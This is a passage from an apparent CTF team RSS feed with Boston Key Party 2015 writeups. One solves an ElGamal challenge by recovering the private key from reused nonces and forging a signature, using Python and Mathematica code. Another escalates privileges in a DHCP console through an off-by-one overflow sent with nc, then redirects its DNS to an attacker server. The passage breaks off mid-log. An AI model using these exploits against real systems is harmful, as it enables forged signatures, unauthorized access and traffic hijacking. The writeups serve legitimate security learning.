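Running guess_alphabet(HEY) reports only the ATOM-128 hit: under the standard alphabet the same string decodes to bytes that are not printable, which is the quick way to tell a custom-alphabet base64 from a real one before trying other schemes.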
<pubDate>Mon, 23 Mar 2015 23:09:43 +0000</pubDate>
<dc:creator>the_storm</dc:creator>
<guid isPermaLink="false">99 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/99#comments</comments>
</item>
<item>
<title>Wood Island (Crypto - 150)</title>
<link>https://ctfcrew.org/writeup/98</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/crypto">crypto</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/32">Boston Key Party 2015</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p><strong>Task:</strong></p><p>You can try to sign messages and send them to the server, 52.0.217.48 port 60231. Sign the right message and you\'ll get the flag! Only problem---you don\'t have the signing key. I will give you this, though: sigs.txt is a file containing a bunch of signatures. I hope it helps. (P.S. Don\'t try and send the exact signatures in that file---that\'s cheating!)</p><p>The archive is attached below.</p><p><strong>Solution:</strong></p><p><!--break--></p><p>Let's start! Unpack the archive and take a look inside. We have three Python scripts and one .txt file. Two of the Python files contain only constants; the last one contains the server implementation. Let's have a closer look at it:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">    def handle(self):
        self.captcha()
        sig = self.request.recv(5000)
        sig = json.loads(sig)
        if "r" not in sig or "s" not in sig or "m" not in sig:
            self.request.close()
            return
        r = sig["r"]
        s = sig["s"]
        m = sig["m"]
        if not elgamal_verify(r, s, m):
            self.request.close()
        elif is_duplicate(sig):
            self.request.close()
        elif m != "There is no need to be upset":
            self.request.close()
        else:
            self.request.sendall(FLAG)
            self.request.close()</pre><p>And:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">def elgamal_verify(r, s, m):
    if r &lt;= 0 or r &gt;= SAFEPRIME:
        return False
    if s &lt;= 0 or s &gt;= SAFEPRIME-1:
        return False
    h = int(hashlib.sha384(m).hexdigest(), 16)
    left = pow(GENERATOR, h, SAFEPRIME)
    right = (pow(PUBKEY, r, SAFEPRIME) * pow(r, s, SAFEPRIME)) % SAFEPRIME
    return left == right

DUPLICATES = []
def is_duplicate(s):
    return s in DUPLICATES</pre><p>So, what is happening here? The first step is an anti-captcha (proof of work): you have to prove that you are a robot (a human can't compute a hash in their head... =) ). It can be bypassed by brute force using the scripts from the previous articles.</p><p>In the second step the server checks the signature: it takes JSON from the user with <em>m</em>, <em>r</em> and <em>s</em> fields and performs some checks:</p><ol><li>the signature <em>(r,s)</em> is valid for the message <em>m</em></li><li>the message and its signature were not used before (not in the given sigs.txt file)</li><li>the message <em>m</em> is equal to "There is no need to be upset"</li></ol><p>So we just have to forge a valid signature for the message "There is no need to be upset".</p><p>Because the verification function is called "elgamal_verify", you may suppose that the server uses the ElGamal scheme. Let's open Wikipedia and gain some information about this <a href="http://en.wikipedia.org/wiki/ElGamal_signature_scheme">scheme</a>.&nbsp;Among other things you can find the "Security" <a href="http://en.wikipedia.org/wiki/ElGamal_signature_scheme#Security">part</a>&nbsp;with some interesting statements in it:</p><p><em><span style="color: #252525; font-family: sans-serif; line-height: 22px;">The signer must be careful to choose a different&nbsp;</span>k<span style="color: #252525; font-family: sans-serif; line-height: 22px;">&nbsp;uniformly at random for each signature and to be certain that&nbsp;</span>k<span style="color: #252525; font-family: sans-serif; line-height: 22px;">, or even partial information about&nbsp;</span>k<span style="color: #252525; font-family: sans-serif; line-height: 22px;">, is not leaked. Otherwise, an attacker may be able to deduce the secret key&nbsp;</span>x<span style="color: #252525; font-family: sans-serif; line-height: 22px;">&nbsp;with reduced difficulty, perhaps enough to allow a practical attack. 
In particular, if two messages are sent using the same value of&nbsp;</span>k<span style="color: #252525; font-family: sans-serif; line-height: 22px;">&nbsp;and the same key, then an attacker can compute&nbsp;</span>x<span style="color: #252525; font-family: sans-serif; line-height: 22px;">&nbsp;directly.</span></em></p><p>And we have the sigs.txt file with several signatures... looks like we are on the right track. But what is <em>k</em>? Wiki says:</p><p><em>To sign a message&nbsp;m&nbsp;the signer performs the following steps.</em></p><ul><li><em>Choose a random&nbsp;k&nbsp;such that 1&nbsp;&lt;&nbsp;k&nbsp;&lt;&nbsp;p&nbsp;−&nbsp;1 and gcd(k,&nbsp;p&nbsp;−&nbsp;1)&nbsp;=&nbsp;1.</em></li><li><em>Compute&nbsp;<img class="mwe-math-fallback-image-inline tex" style="display: inline-block;" src="http://upload.wikimedia.org/math/9/9/8/998605102271444e000a47030ecf2c1d.png" alt=" r \, \equiv \, g^k \pmod p">.</em></li><li><em>Compute&nbsp;<img class="mwe-math-fallback-image-inline tex" style="display: inline-block;" src="http://upload.wikimedia.org/math/e/2/b/e2b71441122c33e81b283228fd1a73dc.png" alt=" s \, \equiv \, (H(m)-x r)k^{-1} \pmod{p-1}">.</em></li><li><em>If&nbsp;<img 
class="mwe-math-fallback-image-inline tex" style="display: inline-block;" src="http://upload.wikimedia.org/math/7/8/7/787d0b6e5d9e7525a7054c6f96c377ea.png" alt="s=0">&nbsp;start over again.</em></li></ul><p>&nbsp;</p><p><em>Then the pair (r,s) is the digital signature of&nbsp;m. The signer repeats these steps for every signature.</em></p><p>So, if the same <em>k</em> was used for two signatures, both signatures have the same <em>r</em>. Let's examine the given sigs.txt file to find repeated <em>r</em> values. For example, this script will do it for you:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">import re

with open('sigs.txt', 'r') as f:
    data = f.read()

# every "r": digits field of the JSON signatures
searcher = re.compile(r'"r": \d+')
r_vals = searcher.findall(data)

# print an r value each time it is seen again
uniq = []
for r in r_vals:
    if r in uniq:
        print r
    else:
        uniq.append(r)</pre><p>Result:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">"r": 24030551483122053624716977527407536977518653033297939409122802809740309624953770247347499500115945237454766787108175375302146086541500888306491588588147326149187734156069939639058405265571675349658277792098286622286226058008567542381029931604553716421740469902946532483973532336362867141732245398972208695076558639383660148089152829691282160772599817042880415931978266720626748559045779449893737272112671672750802677804265935211941474277988895796905249955578045776622418603597677320454557350772863501720544466286669388103247173728880382526588182905215363298438385070158385795742683303408289812120424459186306607441289
"r": 15596574224423604337174975776788465266479462558269645435687330615427783442319450174310669167504694165949734195772140468403401519160093357880254143018633950179114008556651092403391366077557363361555123124177670387232880718011385652224689886844787549431939261644192798219757366042713163922831165605478332687249430607990154018556718572496906645239311390495141354282987806832079357224945158666328969818853986069540836255016227603632402476397515152119360294922495895244235309968400537736534622122663697025389872185310053285819453794953849878570802282548259719716065417998189738453640724390984216257023730024188208988434794
"r": 7642569978590436429035839941747247560961995622187738908962159214058334385040541356267957242899354560757177741259486145756635387643986997662432251492305334195580243624629435620896520306233592274992724847384959546615834897272240261629833454725467996866722488751905291163060514410309569216190018941208834286631363010818364154295177563417071850364776094073956065971376816168479731258230097121738745272755290500815682780120887578487480236247646661452058929568790006839190000789494099743010979644184683260698667768183665065310183202237640230653237055185353887233368385521231171006737686056695974479215510810069532170450224
[Finished in 0.1s]</pre><p>We find three <em>r</em> values which are not unique. So we can perform the attack described above. Wiki says:</p><p><em>s = ( H(m) - xr )k<sup>-1</sup> (mod p-1)</em></p><p><em>sk = H(m) - xr (mod p-1)</em></p><p><em>H(m) = sk + xr (mod p-1)</em></p><p>We have two different messages with two signatures <em>(r,s)</em>, where the <em>s</em> values are different but the <em>r</em> values are equal. So we have a system of two equations:</p><p>H(m<sub>1</sub>) = s<sub>1</sub>k + xr (mod p-1)</p><p>H(m<sub>2</sub>) = s<sub>2</sub>k + xr (mod p-1)</p><p>where <em>x</em> and <em>k</em> are the unknowns. Subtracting the second equation from the first eliminates <em>x</em>: (s<sub>1</sub> - s<sub>2</sub>)k = H(m<sub>1</sub>) - H(m<sub>2</sub>) (mod p-1), which fixes <em>k</em>, and then <em>x</em> follows from either equation. Be careful when solving this system: the integers modulo p-1 form a ring, not a field, so not all elements have a multiplicative inverse. 
For example, an even <em>s</em> has no inverse because p-1 is even; when a coefficient shares a factor d with p-1, the congruence has either d solutions or none.</p><p>You can use any math application to solve the system of equations modulo p-1 and find <em>k</em> and <em>x</em>. I've used Wolfram Mathematica:</p><div data-rz-params="{&quot;__TYPE&quot;:&quot;LINE&quot;,&quot;RANDOM&quot;:0.11121001280844212}"><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">Solve[
15596574224423604337174975776788465266479462558269645435687330615427783442319450174310669167504694165949734195772140468403401519160093357880254143018633950179114008556651092403391366077557363361555123124177670387232880718011385652224689886844787549431939261644192798219757366042713163922831165605478332687249430607990154018556718572496906645239311390495141354282987806832079357224945158666328969818853986069540836255016227603632402476397515152119360294922495895244235309968400537736534622122663697025389872185310053285819453794953849878570802282548259719716065417998189738453640724390984216257023730024188208988434794*x +
20193160426525825914749944534502183854793246273057225225204130786954179606391520252397561856344584750457489718289118609515303464507510251417077403315954173676057341891301159286752647600395198190644724307893515345893595410667424425312908674343690968733843740920409803587443515922925501638028491932183400780974410265039483539351372898810463837406346416273301833999371981123383744331959625540606861187311099827640470542835373136973637049034852358457864170556183428016586548277807973991611705101720973851865311156212618466002189499709957796272187041939722207610584175170433726950035007314375587759506260786928657084551208*y ==
17522164631796177405895087447911918224805069054544219936136496691782804368700681944248318092297704863697843193489206 &amp;&amp;
15596574224423604337174975776788465266479462558269645435687330615427783442319450174310669167504694165949734195772140468403401519160093357880254143018633950179114008556651092403391366077557363361555123124177670387232880718011385652224689886844787549431939261644192798219757366042713163922831165605478332687249430607990154018556718572496906645239311390495141354282987806832079357224945158666328969818853986069540836255016227603632402476397515152119360294922495895244235309968400537736534622122663697025389872185310053285819453794953849878570802282548259719716065417998189738453640724390984216257023730024188208988434794*x +
20950544720225190240516588643124156640166137751307772794120839122642879744566309989204234525193060193095734419581892490241084064977398989989423034374978973475972879096343609617333859217032402467474794063367359126064209414247112196692749986283927599483857635906461630946699655333336064650658571060838418022831773012112148484373450539087980144060939705883970226872558602362137321434221468807558634789744082687788692428002582578979320390623784385653753663765668912704533244714593744067390408848738952250051111603136134591670549919971405683223154547996667007410471545395238084694224087888217638321220704877088996234667758*y ==
32912878155772232082988690525300428836530642510373329387039819701838393571941848326053069623907005119234663553785330,
{x, y},
Modulus -&gt;
27327395392065156535295708986786204851079528837723780510136102615658941290873291366333982291142196119880072569148310240613294525601423086385684539987530041685746722802143397156977196536022078345249162977312837555444840885304704497622243160036344118163834102383664729922544598824748665205987742128842266020644318535398158529231670365533130718559364239513376190580331938323739895791648429804489417000105677817248741446184689828512402512984453866089594767267742663452532505964888865617589849683809416805726974349474427978691740833753326962760114744967093652541808999389773346317294473742439510326811300031080582618145726]</pre><p>And result is:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">Answer:
{{x -&gt; 11405148977472070847365218710766449078537570969688340378848352437920775589263471165689667400222906768815975260917123165802980646318353389631475775638254459726964055271804077962848769755220905417865830271596783314761387652548615547386856401898810558155866110142664500325585994569852700494187601969524512877504501310480889704990280605643619505056187819289992366250062643439920600261106116347627717948112330653523084554538170888898127933270176684391756706118533788708485259278763353731318153045165374215647633533950855383457673005747323515328227853308910032144312613158202921709938645864922336849172162584600594548383769 +
13663697696032578267647854493393102425539764418861890255068051307829470645436645683166991145571098059940036284574155120306647262800711543192842269993765020842873361401071698578488598268011039172624581488656418777722420442652352248811121580018172059081917051191832364961272299412374332602993871064421133010322159267699079264615835182766565359279682119756688095290165969161869947895824214902244708500052838908624370723092344914256201256492226933044797383633871331726266252982444432808794924841904708402863487174737213989345870416876663481380057372483546826270904499694886673158647236871219755163405650015540291309072863 C[1],
y -&gt; 12780654076712315342557968007566379935229954276230807639665702142103549136408699104332337502550652581806514878279261654171262095484373525061520969023188821681199026858966468950451221700940218653506601368343894689092533052209732513940302093154785769183690626111706770904919054659023003137158039635431673035380262813165085357833180324316706979051198536038699978511970853276885780181015508612084020605897756865495255350696748220033237316185373458895608809435734616059720556237199048361906711902462009427742458373806078932083281313989085236666731027152436636238565509653859120339870549660036293474217320107816478127848604 +
13663697696032578267647854493393102425539764418861890255068051307829470645436645683166991145571098059940036284574155120306647262800711543192842269993765020842873361401071698578488598268011039172624581488656418777722420442652352248811121580018172059081917051191832364961272299412374332602993871064421133010322159267699079264615835182766565359279682119756688095290165969161869947895824214902244708500052838908624370723092344914256201256492226933044797383633871331726266252982444432808794924841904708402863487174737213989345870416876663481380057372483546826270904499694886673158647236871219755163405650015540291309072863 C[2]}}</pre><p><br>As you can see, the system has multiple solutions: C[1] and C[2] are free integer parameters, and since their coefficient is (p-1)/2, each of <em>x</em> and <em>k</em> has two candidates modulo p-1.&nbsp;</p><p>You can quickly check all four combinations by forging four variants of the <em>(r,s)</em> signature for <em>m</em> = "There is no need to be upset" and sending them to the server. If you reuse the same <em>r</em> as in sigs.txt, you only need to compute <em>s</em>, so:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">import hashlib
from Crypto.Util.number import inverse  # assumed source of the inverse() used below; the writeup does not name it
M = SAFEPRIME - 1  # the modulus p-1 (SAFEPRIME comes from the challenge's constants file)
K = 12780654076712315342557968007566379935229954276230807639665702142103549136408699104332337502550652581806514878279261654171262095484373525061520969023188821681199026858966468950451221700940218653506601368343894689092533052209732513940302093154785769183690626111706770904919054659023003137158039635431673035380262813165085357833180324316706979051198536038699978511970853276885780181015508612084020605897756865495255350696748220033237316185373458895608809435734616059720556237199048361906711902462009427742458373806078932083281313989085236666731027152436636238565509653859120339870549660036293474217320107816478127848604 + 
13663697696032578267647854493393102425539764418861890255068051307829470645436645683166991145571098059940036284574155120306647262800711543192842269993765020842873361401071698578488598268011039172624581488656418777722420442652352248811121580018172059081917051191832364961272299412374332602993871064421133010322159267699079264615835182766565359279682119756688095290165969161869947895824214902244708500052838908624370723092344914256201256492226933044797383633871331726266252982444432808794924841904708402863487174737213989345870416876663481380057372483546826270904499694886673158647236871219755163405650015540291309072863
R = 15596574224423604337174975776788465266479462558269645435687330615427783442319450174310669167504694165949734195772140468403401519160093357880254143018633950179114008556651092403391366077557363361555123124177670387232880718011385652224689886844787549431939261644192798219757366042713163922831165605478332687249430607990154018556718572496906645239311390495141354282987806832079357224945158666328969818853986069540836255016227603632402476397515152119360294922495895244235309968400537736534622122663697025389872185310053285819453794953849878570802282548259719716065417998189738453640724390984216257023730024188208988434794
Kinv = inverse(K, M)
print Kinv
11229564743034185040004960050772054007682662152342489588663134546157830837439948644777566056798431052050328871856833998547970536669342678490701009207205388039479343267225423580587116767573396520467953567708885431696965609591547186713704202330941400518771586809861731353532477280946818593198085158822727812249062666604332954171368291583140313845753585453894318934470456670469827222218354006201600442374222432023493236612146637469249317961367788649325550166802023675758482489748891700581825892091702679217253672563341697873025935541062804335772599169547952882534586596303285146433449671309000641194778425709515061034061L
H = int(hashlib.sha384("There is no need to be upset").hexdigest(), 16)
X = 11405148977472070847365218710766449078537570969688340378848352437920775589263471165689667400222906768815975260917123165802980646318353389631475775638254459726964055271804077962848769755220905417865830271596783314761387652548615547386856401898810558155866110142664500325585994569852700494187601969524512877504501310480889704990280605643619505056187819289992366250062643439920600261106116347627717948112330653523084554538170888898127933270176684391756706118533788708485259278763353731318153045165374215647633533950855383457673005747323515328227853308910032144312613158202921709938645864922336849172162584600594548383769 + 13663697696032578267647854493393102425539764418861890255068051307829470645436645683166991145571098059940036284574155120306647262800711543192842269993765020842873361401071698578488598268011039172624581488656418777722420442652352248811121580018172059081917051191832364961272299412374332602993871064421133010322159267699079264615835182766565359279682119756688095290165969161869947895824214902244708500052838908624370723092344914256201256492226933044797383633871331726266252982444432808794924841904708402863487174737213989345870416876663481380057372483546826270904499694886673158647236871219755163405650015540291309072863
S = ((H - X * R) * Kinv) % M
print S
11057062360037254017289635018921773984183564064092395096838773711381090984064311698289768170915721461871937003117929770925039756903570621025707383705465627567970676462056327449577227456755524929286234463839696828725619393734746030826431182855696671016288244742041130665258517881078515879578523743937721290168743838774382061947237978837869517592441458667243091811392910778481879611111807313162640186698122857701857400429810865528683646940672873418762238830032505222891402579366927300508292794863485872865578871520392827529932070319462416460050694529429370692076137317134639455980792967653965353227009612149885652150641L</pre><p>&nbsp;Send the (r,s,m) JSON and get:</p><p>nonces_are_fucking_rad_amirite</p><p><strong>Flag:&nbsp;nonces_are_fucking_rad_amirite</strong></p><p>&nbsp;</p></div></div></div></div><div class="field 
field-name-field-file field-type-file field-label-above"><div class="field-label">Attachments:&nbsp;</div><div class="field-items"><div class="field-item even"><span class="file"><img class="file-icon" alt="Binary Data" title="application/octet-stream" src="/modules/file/icons/application-octet-stream.png" /> <a href="https://ctfcrew.org/sites/default/files/writeups/wood-island.tar_.gz" type="application/octet-stream; length=546593">wood-island.tar_.gz</a></span></div></div></div></description>
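The key recovery in the writeup above was done by hand in Mathematica. The following Python is an added example, not part of the writeup or of the challenge's code, that carries the same attack through end to end on constructed toy parameters: a small safe prime P = 2579, the private key 1234 and two made-up messages, none of which are the challenge's values. It follows the derivation given in the writeup: subtract the two equations to eliminate x, solve the resulting congruence modulo p-1 while allowing for the gcd (this is where the C[1], C[2] branches of the Solve[] output come from), keep the candidate for which g^k equals r and g^x equals y, and then sign the target message with the recovered key. The sign and verify helpers mirror the server's elgamal_verify, including its range checks.

```python
import hashlib
import math

# Constructed toy parameters, not the challenge's constants: P = 2*1289 + 1 is a safe
# prime, so the ring modulo P-1 has the same 2 * prime shape as the real one.
P = 2579


def find_generator(p):
    """Smallest g generating the whole group: g^2 != 1 and g^q != 1 (mod p), q = (p-1)/2."""
    q = (p - 1) // 2
    for g in range(2, p):
        if pow(g, 2, p) != 1 and pow(g, q, p) != 1:
            return g
    raise ValueError("no generator found")


def H(m):
    """Same hash as the server: SHA-384 of the message, read as an integer."""
    return int(hashlib.sha384(m).hexdigest(), 16)


def elgamal_sign(p, g, x, m, k):
    """Textbook ElGamal signature with a caller-supplied nonce k (the bug under study)."""
    n = p - 1
    if math.gcd(k, n) != 1:
        raise ValueError("k must be invertible modulo p-1")
    r = pow(g, k, p)
    s = (H(m) - x * r) * pow(k, -1, n) % n
    if s == 0:
        raise ValueError("s == 0, pick another k")
    return r, s


def elgamal_verify(p, g, y, r, s, m):
    """Mirrors the server's elgamal_verify: range checks, then g^H(m) == y^r * r^s (mod p)."""
    if not (p > r > 0) or not (p - 1 > s > 0):
        return False
    return pow(g, H(m), p) == pow(y, r, p) * pow(r, s, p) % p


def solve_linear_congruence(a, b, n):
    """All t in [0, n) with a*t == b (mod n).  Z/(p-1) is a ring, not a field: the list
    is empty unless gcd(a, n) divides b, and otherwise has gcd(a, n) entries."""
    a %= n
    b %= n
    d = math.gcd(a, n)
    if b % d:
        return []
    n2 = n // d
    inv = pow(a // d, -1, n2) if n2 > 1 else 0
    t0 = (b // d) * inv % n2
    return [t0 + i * n2 for i in range(d)]


def recover_from_nonce_reuse(p, g, y, m1, sig1, m2, sig2):
    """Two signatures with the same r share k.  Subtracting s1*k == H(m1) - x*r and
    s2*k == H(m2) - x*r (mod p-1) gives (s1 - s2)*k == H(m1) - H(m2).  Each candidate k
    is checked against g^k == r, then x is read off the first equation and checked
    against g^x == y; that filtering picks the right C[1], C[2] branch of Solve[]."""
    (r, s1), (r2, s2) = sig1, sig2
    if r != r2:
        raise ValueError("different r values: the nonce was not reused")
    n = p - 1
    h1, h2 = H(m1), H(m2)
    for k in solve_linear_congruence(s1 - s2, h1 - h2, n):
        if pow(g, k, p) != r:
            continue
        for x in solve_linear_congruence(r, h1 - s1 * k, n):
            if pow(g, x, p) == y:
                return x, k
    raise ValueError("no consistent (x, k) found")


def forge(p, g, x, m):
    """With the private key we can sign anything; any invertible k giving s != 0 will do."""
    for k in range(2, p - 1):
        try:
            return elgamal_sign(p, g, x, m, k)
        except ValueError:      # k not invertible or s == 0: try the next one
            continue
    raise ValueError("could not forge a signature")


def demo():
    """Sign two constructed messages with one k, recover the key, forge the target."""
    p = P
    g = find_generator(p)
    x = 1234                                 # constructed private key
    y = pow(g, x, p)                         # public key
    m1, m2 = b"first message", b"second message"
    target = b"There is no need to be upset"
    for k in range(3, p - 1):                # the reused nonce; skip any k that makes s == 0
        try:
            sig1 = elgamal_sign(p, g, x, m1, k)
            sig2 = elgamal_sign(p, g, x, m2, k)
            break
        except ValueError:
            continue
    x_rec, k_rec = recover_from_nonce_reuse(p, g, y, m1, sig1, m2, sig2)
    forged = forge(p, g, x_rec, target)
    return {"x": x_rec, "k": k_rec, "k_used": k, "sig": forged,
            "valid": elgamal_verify(p, g, y, forged[0], forged[1], target)}
```

demo() returns the recovered private key and nonce together with a forged signature on the target message that passes the server-style check. The candidate filtering in recover_from_nonce_reuse is the general form of "try all four combinations": with p-1 = 2q there are at most two candidates per unknown, but the same code handles any gcd.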
<pubDate>Wed, 04 Mar 2015 08:58:45 +0000</pubDate>
<dc:creator>Triff</dc:creator>
<guid isPermaLink="false">98 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/98#comments</comments>
</item>
<item>
<title>Kendall (pwn - 300)</title>
<link>https://ctfcrew.org/writeup/97</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/pwn">pwn</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/32">Boston Key Party 2015</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>The task description is pretty small:</p><p>52.0.164.37:8888</p><p>And a <a href="https://ctfcrew.org/sites/default/files/writeups/kendall.tar_.gz">link</a> to the file (ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped).</p><p>&nbsp;</p><p><strong>Solution</strong></p><p>After connecting to the server we receive the following menu:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">#####################################################
# DHCP Management Console #
# Auditing Interface #
#####################################################
h show this help
a authenticate
c config menu
d dhcp lease menu
e exit
[m]#</pre><p><em>authenticate</em> - the stage for entering the administrator's password</p><p><em>config menu</em>:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">[c]# h
h show this help
l list keys/values
s change start ip
e change end ip
k change netmask ip
n change nameserver ip
m return to main menu
[c]# l
DHCP Configuration:
Start IP: 192.168.000.100
End IP: 192.168.000.200
Netmask: 255.255.255.000
Nameserver: 8.8.8.8</pre><p><em>dhcp lease menu</em>:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">[d]# h
h show this help
r renew leases
l list leases
f filter leases
m return to main menu
</pre><p>&nbsp;</p><p>Ok, we've got some sort of router management console. But the task's category is pwn and we've got the binary, so...</p><p><img src="/sites/default/files/writeups/images/bk2015kendall_writeup_meme_image.jpg" alt="" width="420" height="250"></p><p>Surely we should reverse the binary and find some vulnerable stuff there!</p><p>After investigating the binary we notice that all input is read into the global buffer <em>s2</em>, whose size is exactly 128 bytes:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_global_buffer_s2.PNG" alt="" width="651" height="210"></p><p>Hopefully you've already noticed that the buffer is followed by a global variable holding the current user's status: administrator or not. I called it <em>adminFlag</em>. The only legitimate way to change that flag is through the&nbsp;<em>authenticate</em> menu. Authentication is served by the following function:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kenall_password_cheking.PNG" alt="" width="529" height="489"></p><p>And it looks pretty safe. But if we try to understand how the <em>input reading</em> function works:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_read_128_func.PNG" alt="" width="352" height="411"></p><p>we see that there is an off-by-one error: the terminating zero is written one byte past the buffer. Fortunately that byte is the <em>adminFlag</em>, which has to be zeroed to escalate our access rights. So for escalation to administrator we need to:</p><ul><li>find a call to <em>sub_400EA6()</em> with a length argument &gt;= 128</li><li>write 128 bytes followed by&nbsp;<strong>'\n'</strong> so that the 129th byte becomes zero</li></ul><p>Jumping to the xrefs of&nbsp;<em>sub_400EA6()</em> we find one place where it is called with a length argument of 128:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_filter_function.PNG" alt="" width="482" height="455"></p><p>Nice! It is the <em>filter leases</em> stage of the&nbsp;<em>dhcp lease menu</em> we saw above. 
Well, the exploit for privilege escalation is easy and small:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">doris$ python -c "open('pl', 'wb').write('d\n' + 'f\n' + 'A' * 128 + '\n')"
doris$ cat pl - | nc 52.0.164.37 8888
#####################################################
# DHCP Management Console #
# Auditing Interface #
#####################################################
h show this help
a authenticate
c config menu
d dhcp lease menu
e exit
[m]# [d]# Enter filter condition: [d]$</pre><p>BOOM! We became the administrator. Sadly, it does not give us any flag. The task is worth 300 points, by the way, so it should not be that easy. As administrator we now have additional possibilities in the service. Now we are able to:</p><p>not only list but also change the DHCP configuration:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">[c]$ l
DHCP Configuration:
Start IP: 192.168.000.100
End IP: 192.168.000.200
Netmask: 255.255.255.000
Nameserver: 8.8.8.8
[c]$ s
Current Value: 192.168.000.100
New Value: asd
Your input asd cointains invalid characters. Only digits and dots allowed!</pre><p>and now we can execute the <em>renew leases</em> action:</p><p><img src="/sites/default/files/writeups/images/bkp_kenall_renew_leases_system_call.PNG" alt="" width="886" height="193"></p><p>OMG! It is a plain <em>system()</em> call with a string controlled by us (the arguments for sprintf are the IP addresses of the DHCP config).</p><p>Sadly again, it is not so easy. It is a BKP CTF task for 300 points, remember?</p><p>The function that processes a DHCP settings update is called for each IP address we input:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_read_ip_and_change.PNG" alt="" width="910" height="514"></p><p>It has some small bugs, but anyway we cannot provide any useful payload for the <em>system()</em> call - only digits and dots are really allowed.</p><p>Further investigation of the binary did not reveal any other exploitable vulnerabilities. We were really stuck, because it is a <em>pwn</em> task and usually we expect some serious binary exploitation, even hardcore exploitation because of the 300 points.</p><p>Later, when we finally understood that there was nothing more to do with the binary, we returned to:</p><p>&nbsp;<img src="/sites/default/files/writeups/images/bkp2015_kendall_dhcp_lease_menu_meme.PNG" alt="" width="427" height="194"></p><p>&nbsp;While fuzzing the DHCP settings we set the DNS IP to our own server's address and then listen for any incoming traffic there:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/tmp# tcpdump -n dst port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
12:27:44.272585 IP 52.0.164.37.52440 &gt; 188.166.48.175.53: 26405+ A? yandex.ru. (27)
</pre><p>Stop please...</p><p>We received a DNS query for the hostname of Russia's leading search engine?</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_meme_what.jpg" alt="" width="600" height="374"></p><p>That is really surprising and a little unbelievable, because the CTF is hosted by the BostonKeyParty team from the USA, but it is true. Looks like the time for some <em>DNS spoofing</em> has come:</p><p>Honestly, <em>yandex.ru</em> is not the only hostname queried by the task's service (52.0.164.37). Next it queries the <em>my.bank</em> domain.</p><p>After spoofing the <em>yandex.ru</em> address we tried to listen on port 80 on our server but did not receive any traffic. After solving the challenge we learned from the task author that we should have received an HTTP request on port 80, but honestly we did not receive it.</p><p>One of the ways to go further is to set up a <em>dnsmasq</em> service:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/tmp# dnsmasq --no-daemon --log-queries
dnsmasq: started, version 2.62 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 209.244.0.3#53
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 8 addresses
dnsmasq: query[A] yandex.ru from 52.0.164.37
dnsmasq: forwarded yandex.ru to 8.8.4.4
dnsmasq: forwarded yandex.ru to 8.8.8.8
dnsmasq: forwarded yandex.ru to 209.244.0.3
dnsmasq: reply yandex.ru is 213.180.204.11
dnsmasq: reply yandex.ru is 93.158.134.11
dnsmasq: reply yandex.ru is 213.180.193.11
dnsmasq: query[A] yandex.ru from 52.0.164.37
dnsmasq: cached yandex.ru is 213.180.193.11
dnsmasq: cached yandex.ru is 93.158.134.11
dnsmasq: cached yandex.ru is 213.180.204.11
dnsmasq: query[A] my.bank from 52.0.164.37
